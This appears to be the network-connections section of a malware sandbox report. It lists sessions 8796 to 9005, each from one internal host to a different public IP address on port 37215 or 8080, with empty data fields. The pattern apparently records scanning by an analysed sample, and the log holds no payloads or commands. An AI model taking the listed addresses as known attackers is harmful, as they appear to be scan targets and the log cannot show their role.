                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8796192.168.2.2347024157.104.190.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8797192.168.2.234116439.15.210.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8798192.168.2.2352048197.190.139.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8799192.168.2.2353810157.250.130.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8800192.168.2.235234241.86.29.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8801192.168.2.2336814204.208.65.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8802192.168.2.2338176115.69.227.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8803192.168.2.2339562197.85.183.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8804192.168.2.2355158197.177.39.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8805192.168.2.2343756197.114.146.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8806192.168.2.235526841.83.218.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8807192.168.2.235535841.186.17.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8808192.168.2.2349856197.109.200.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8809192.168.2.2358218157.69.223.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8810192.168.2.2347244157.140.24.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8811192.168.2.235723241.148.99.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8812192.168.2.2345906197.184.18.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8813192.168.2.2338072157.29.185.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8814192.168.2.234288039.149.103.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8815192.168.2.235162893.107.62.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8816192.168.2.234614812.210.22.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8817192.168.2.234187841.11.215.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8818192.168.2.234123841.86.7.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8819192.168.2.2352638190.163.24.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8820192.168.2.2343834197.182.73.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8821192.168.2.2349972157.1.212.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8822192.168.2.2350958170.25.38.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8823192.168.2.2341544157.225.0.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8824192.168.2.233390624.123.193.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8825192.168.2.235991841.17.17.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8826192.168.2.2360572149.182.21.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8827192.168.2.2356782157.232.79.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8828192.168.2.234574825.91.105.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8829192.168.2.233949641.249.19.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8830192.168.2.2335880157.107.223.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8831192.168.2.2337866157.107.75.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8832192.168.2.23428329.71.52.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8833192.168.2.235732241.62.197.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8834192.168.2.2357164220.60.174.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8835192.168.2.2360686197.67.242.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8836192.168.2.2355606157.188.36.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8837192.168.2.2337104157.128.194.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8838192.168.2.2358502157.94.49.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8839192.168.2.233686841.235.234.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8840192.168.2.2347346197.47.25.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8841192.168.2.2352500157.109.143.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8842192.168.2.2356386139.153.3.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8843192.168.2.234577441.205.100.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8844192.168.2.2360596157.82.103.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8845192.168.2.2357884151.241.16.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8846192.168.2.2346256197.182.177.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8847192.168.2.2358440197.195.205.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8848192.168.2.2358622157.62.21.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8849192.168.2.2360412197.118.186.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8850192.168.2.2349074197.42.111.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8851192.168.2.2352492157.12.54.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8852192.168.2.2356014197.16.20.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8853192.168.2.2347854165.100.164.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8854192.168.2.2354296197.174.119.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8855192.168.2.2334170121.215.248.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8856192.168.2.2339212197.251.156.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8857192.168.2.233941841.235.0.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8858192.168.2.235124674.46.42.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8859192.168.2.2352974197.248.194.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8860192.168.2.2337214199.79.123.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8861192.168.2.2342070197.104.226.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8862192.168.2.2339404197.217.18.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8863192.168.2.234103241.219.254.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8864192.168.2.2356084197.132.209.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8865192.168.2.2347694157.98.41.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8866192.168.2.2344130157.76.59.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8867192.168.2.2344984157.252.226.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8868192.168.2.235933441.113.173.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8869192.168.2.2346882130.198.18.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8870192.168.2.2338470162.220.254.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8871192.168.2.2359010157.109.81.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8872192.168.2.2358512157.234.178.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8873192.168.2.235346641.79.25.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8874192.168.2.2338982123.48.235.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8875192.168.2.2349340197.79.109.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8876192.168.2.2332776157.143.141.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8877192.168.2.236091480.59.224.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8878192.168.2.2356538157.108.201.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8879192.168.2.2337756157.135.50.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8880192.168.2.233603065.107.25.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8881192.168.2.2348190157.212.175.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8882192.168.2.234610241.169.57.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8883192.168.2.2341750199.37.73.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8884192.168.2.2351448157.169.227.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8885192.168.2.234210441.25.231.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8886192.168.2.2357006197.252.87.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8887192.168.2.235343241.241.141.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8888192.168.2.2351580157.199.230.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8889192.168.2.234298041.49.159.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8890192.168.2.2343922157.160.223.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8891192.168.2.2338882197.144.70.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8892192.168.2.2348882128.231.153.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8893192.168.2.2360166197.38.133.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8894192.168.2.2353944157.79.81.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8895192.168.2.2360316206.108.42.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8896192.168.2.2352902197.234.2.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8897192.168.2.235216041.134.131.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8898192.168.2.2343474197.221.20.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8899192.168.2.2337378157.174.13.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8900192.168.2.2349960197.241.204.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8901192.168.2.2333772157.51.174.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8902192.168.2.2344222157.86.221.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8903192.168.2.235659668.104.3.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8904192.168.2.234594241.204.15.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8905192.168.2.2354410197.20.32.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8906192.168.2.2353916157.60.110.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8907192.168.2.2344302111.204.94.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8908192.168.2.2335316157.156.249.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8909192.168.2.2351756157.7.246.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8910192.168.2.2356260157.101.169.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8911192.168.2.2355224197.43.37.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8912192.168.2.2349912184.152.131.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8913192.168.2.2348194157.215.140.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8914192.168.2.2358362152.235.3.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8915192.168.2.2342700197.112.17.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8916192.168.2.2333860157.116.36.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8917192.168.2.236016641.170.132.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8918192.168.2.234248641.11.137.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8919192.168.2.235941841.67.228.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8920192.168.2.2347726197.156.207.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8921192.168.2.2347504172.159.161.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8922192.168.2.2334054123.169.242.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8923192.168.2.234688241.2.250.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8924192.168.2.235559243.177.183.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8925192.168.2.2350076156.1.71.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8926192.168.2.233382423.239.244.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8927192.168.2.2357466221.238.51.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8928192.168.2.234437287.218.174.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8929192.168.2.2350180159.207.163.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8930192.168.2.2353746155.74.102.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8931192.168.2.2334586173.117.146.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8932192.168.2.2339780222.124.55.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8933192.168.2.235469268.204.11.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8934192.168.2.233429691.206.36.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8935192.168.2.234096212.146.244.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8936192.168.2.2344168105.209.224.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8937192.168.2.235042645.115.154.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8938192.168.2.2343516185.146.169.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8939192.168.2.23592308.150.255.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8940192.168.2.23451348.209.85.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8941192.168.2.2339248144.96.238.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8942192.168.2.2352874142.163.219.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8943192.168.2.235118871.130.143.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8944192.168.2.2345974163.254.33.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8945192.168.2.2354784105.114.152.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8946192.168.2.233307289.146.242.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8947192.168.2.2359224112.8.171.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8948192.168.2.2342096111.242.146.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8949192.168.2.234691052.211.30.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8950192.168.2.234869014.157.72.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8951192.168.2.2358462185.34.146.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8952192.168.2.234371085.80.110.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8953192.168.2.233502618.71.124.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8954192.168.2.2348162120.200.24.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8955192.168.2.2339626126.49.74.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8956192.168.2.2355348198.85.198.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8957192.168.2.2357562202.98.42.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8958192.168.2.2350974165.7.181.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8959192.168.2.234487666.128.78.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8960192.168.2.233422072.188.144.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8961192.168.2.2359790193.236.207.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8962192.168.2.235048466.194.171.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8963192.168.2.233720043.137.192.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8964192.168.2.23545348.141.92.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8965192.168.2.2333328217.6.177.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8966192.168.2.233765636.164.113.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8967192.168.2.2360624114.227.45.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8968192.168.2.233874873.5.226.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8969192.168.2.233644264.55.9.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8970192.168.2.23395489.39.184.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8971192.168.2.2350606188.63.135.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8972192.168.2.234326683.0.244.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8973192.168.2.2336658196.159.34.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8974192.168.2.233544477.32.117.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8975192.168.2.2360796161.207.134.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8976192.168.2.234915032.94.215.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8977192.168.2.233477618.74.158.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8978192.168.2.2338664206.234.224.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8979192.168.2.2338350209.120.74.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8980192.168.2.2342924152.228.207.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8981192.168.2.235559661.7.5.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8982192.168.2.23370281.82.0.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8983192.168.2.2351804119.190.116.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8984192.168.2.2345720118.224.230.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8985192.168.2.2342884100.43.123.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8986192.168.2.2337106107.155.32.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8987192.168.2.23368285.205.36.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8988192.168.2.2336460190.167.246.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8989192.168.2.2340466217.23.19.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8990192.168.2.2350986201.64.204.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8991192.168.2.2332906117.221.217.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8992192.168.2.235051443.59.5.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8993192.168.2.2334690141.195.227.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8994192.168.2.235840232.91.66.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8995192.168.2.234292280.29.228.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8996192.168.2.2354582118.24.190.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8997192.168.2.233763085.134.202.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8998192.168.2.2358156172.88.234.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8999192.168.2.2356124205.58.87.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9000192.168.2.2353424183.200.171.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9001192.168.2.235160866.152.164.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9002192.168.2.2346070126.148.49.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9003192.168.2.2346180221.165.222.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9004192.168.2.234456859.148.210.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9005192.168.2.2345996173.41.134.2298080
